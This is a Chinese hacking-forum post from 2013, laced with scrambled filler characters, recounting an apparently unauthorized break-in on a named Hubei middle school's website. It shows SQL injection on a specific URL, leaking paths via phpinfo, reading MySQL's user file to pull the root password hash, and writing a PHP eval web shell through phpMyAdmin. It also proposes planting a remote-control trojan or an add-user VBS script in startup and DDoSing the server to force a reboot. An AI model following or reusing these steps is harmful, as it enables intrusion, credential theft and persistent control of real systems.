找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2599|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
4 J9 Z. ^$ r* ?5 H; [1 ?; f发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
# T: G. B9 ]7 s- {" s2 k8 G" ~  ^4 H, o

# x0 C& i5 L5 A4 ]. A6 [' {3 m6 {/ |3 J$ j$ Y
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
3 W. M* J7 F' x
8 o) F* C0 f+ P+ W5 {% J8 |/ M那么想可以直接写入shell ,getshell有几个条件:- T6 l7 A- U& U, R& Q
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF- Y6 k8 B& D# I# L

7 }$ q4 Q; O, b6 x1 A试着爆绝对路径:* w' G& U" P4 W" {+ Y
1./phpMyAdmin/index.php?lang[]=1  
. Q8 \6 Z: f8 }6 C9 ]' S2./phpMyAdmin/phpinfo.php  
& H: ^$ i  t7 H- c4 y3 z# p  Q3./load_file()  9 b$ m! L  C- I- R
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  2 m8 x3 t$ b7 h# O* e7 e( W. w
5./phpmyadmin/libraries/select_lang.lib.php  
- J" Z9 _2 R$ P& c' W6./phpmyadmin/libraries/lect_lang.lib.php  
) V1 H5 O5 V. h0 l4 l5 n7./phpmyadmin/libraries/mcrypt.lib.php   
, R9 k' M! d9 |" d. i" C3 b8./phpmyadmin/libraries/export/xls.php  6 |6 l% X, z7 F# m, w% B

% i6 g. I* S( j4 Z, Y- H. n均不行...........................
. }- n1 n* |7 U5 r1 E0 a4 f
/ w) D- k, K! A% ?7 v6 p* I御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 ~8 p. v; i5 U& M9 ~) W; V
5 q  k7 `* z  b2 T权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin % H; U# c& e( S" m5 Q# j
0 S) E+ i. ]! V3 G2 W( C$ w
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
$ D, f0 y5 u4 k5 Q# Q* b$ k: Z. ~! \  c) W6 O0 f
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
$ U7 U5 s  K% q5 _4 e0 o  i8 w, `3 A1 _4 y* Q. j  Q8 C' k' ~0 j
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
2 @2 `2 b! ~3 b% G* ?4 j2 v; j. s& K1 |# i+ @1 m3 `% k$ ]
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ; X7 {" }+ V# g+ i
! Y6 i1 T, w7 }
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD   z+ W7 A* z- x. F9 d5 I
# x, c- j* B6 S3 Y- y" P- n4 G& ]. l
成功读到root密码:# M" N: i6 J3 `2 C

! y0 l6 V& f$ M: |17---- r(0072)
- J8 a# p2 x; N$ I2 J3 e18---- o(006f)
2 P6 B8 \: z- R! F% t& I# @19---- o(006f)
# k+ T& ]2 H4 M" P0 k5 f4 d7 t20---- t(0074)
* x/ U2 ?3 [' d) v2 t: J21---- *(002a)- s+ \+ ?* F, T1 P0 W' B: t
22---- 8(0038); w. u1 {3 a" a1 D' L. v
23---- 2(0032)0 c) Q  B1 y/ ]$ R5 y) Q
24---- E(0045)4 s. r, Q4 y1 T$ i7 _
25---- 1(0031)$ n! l1 c9 }- c" S0 [0 L
26---- C(0043)% {& d- m; V- L" X4 j" L. m
27---- 5(0035)8 m; v' D( h4 ]& H: s7 A
28---- 8(0038)
$ v- l( Y; p# f. ]/ Q$ m8 n29---- 2(0032)
* O# u; q6 U# `) H: p3 X30---- 8(0038)' _. b+ l! H7 |7 w. q* K  }
31---- A(0041)
7 J" c1 Z& t2 i0 y32---- 9(0039)7 o" C3 N# U( M  F7 E% }
33---- B(0042)( U' C5 @# w6 t% ?
34---- 5(0035)! W# X: q0 n) f3 U3 Q. p! C, R$ _
35---- 4(0034)/ ~/ n: q* G# w' `6 a9 o5 G: c
36---- 8(0038)- U2 \# u2 F' [  |% O
37---- 6(0036)7 ]: C$ z8 Q; R7 M8 b  Y
38---- 4(0034)% x$ m, J7 [; J" v8 {
39---- 9(0039)% M" k) h- c+ u0 E: B9 Q* M$ x4 p
40---- 1(0031)
  ^$ p! Y: l) @1 O# ^41---- 1(0031)6 y. P) I. G6 V6 X2 _! O. l" S
42---- 5(0035)& K8 `/ J, B- U, i2 |! r: B' J
43---- 3(0033)
% [8 t- H: \0 }1 {) I% Z, d" v( G44---- 5(0035)
5 T! u$ i( {$ N  P* }" z45---- 9(0039)) q" e2 I6 P+ Z9 o
46---- 8(0038)
; ?( u* M2 a- E' G( r47---- F(0046)
1 C  a9 Z" J) Q+ K48---- F(0046)
; ~+ F8 P: @" w3 A7 f9 N2 w49---- 4(0034)
- w* v+ F" R+ _* w0 q50---- F(0046)9 r) G9 t3 f1 }
51---- 0(0030)
" n6 b! `1 n. C" h; Q* k' U  `( c52---- 3(0033)
# Z9 P5 N# F$ l3 y53---- 2(0032)8 {5 J' l' k4 p" h) O" G
54---- A(0041)
8 E1 s! r5 l1 f2 R. j& n# S55---- 4(0034)
7 t6 q, }1 l. ]( u56---- A(0041)' [5 x/ W. r! x4 V/ C. r. `
57---- B(0042)5 Y) ^+ S! d- {. B, M% j
58---- *(0044)
! m2 T0 M. L5 K: k: a( E2 ?59---- *(0035)
8 i# Q8 N# X2 a  k) h1 B1 G60---- *(0041)
2 h7 j/ l: P- S61---- *0032)- B# j, y: u, I' ^* l- v; M7 k

0 N2 X' ~$ [2 V5 X解密后成功登陆phpmyamin
9 E: ?4 n. y; Z2 G7 @                          * }1 P0 Q1 _1 D' h" C

$ v1 ]# P4 g$ E0 ~                             ) o5 S; L: F! A& }
. V7 J7 T& S; y1 }1 ^
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
3 y/ z- H6 C/ u& P; }% {1 [: o, o6 h; W) f+ u
成功执行,拿下shell,菜刀连接:7 H* O6 r$ }2 l6 S% A0 n
/ z; e1 Z4 r- k1 n: `
服务器不支持asp,aspx,php提权无果...................
/ J% ]! w8 J, J/ A/ [7 V$ A5 |9 m7 s& X/ E; j- |( G
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:* I+ |6 O$ y; s. N% H
服务器上已经有个隐藏帐号了
# {0 m6 b' T1 b7 Q% b' @7 a3 e
别名     administrators2 J. Y) U, Z8 e2 E* J- ~" }% d
注释     管理员对计算机/域有不受限制的完全访问权
( w6 J1 J" K$ Z; w! C( ^* E
成员

0 L% B2 Z. `; ]* D+ }$ l4 f  b
-------------------------------------------------------------------------------
6 L; @, d- i2 }* O+ O. j/ Zadmin
/ M  L6 o) O5 t$ q, a2 I6 D3 ?Administrator. N1 I6 D$ k. K( H) S) x2 v# U
slipper$$ ?  J* ^9 X5 _! w
sqluser
7 y) n8 d3 `  B5 t* C, v命令成功完成。
8 m* F* b8 D% U- B* }' Y4 }! t. u5 F( {' E
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
/ v+ s7 M  U, k% G% X+ i* k: ^! T3 x$ p( a: y- q( |% c
ddos服务器重启,不然就只能坐等服务器重启了...............................! u6 ?" f$ W: Q% D$ Q$ S. e/ R

" r1 O' n/ T2 r- A5 A# }  ]" o      

" S+ o5 Z3 S9 ~1 d4 c; ]8 [2 C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表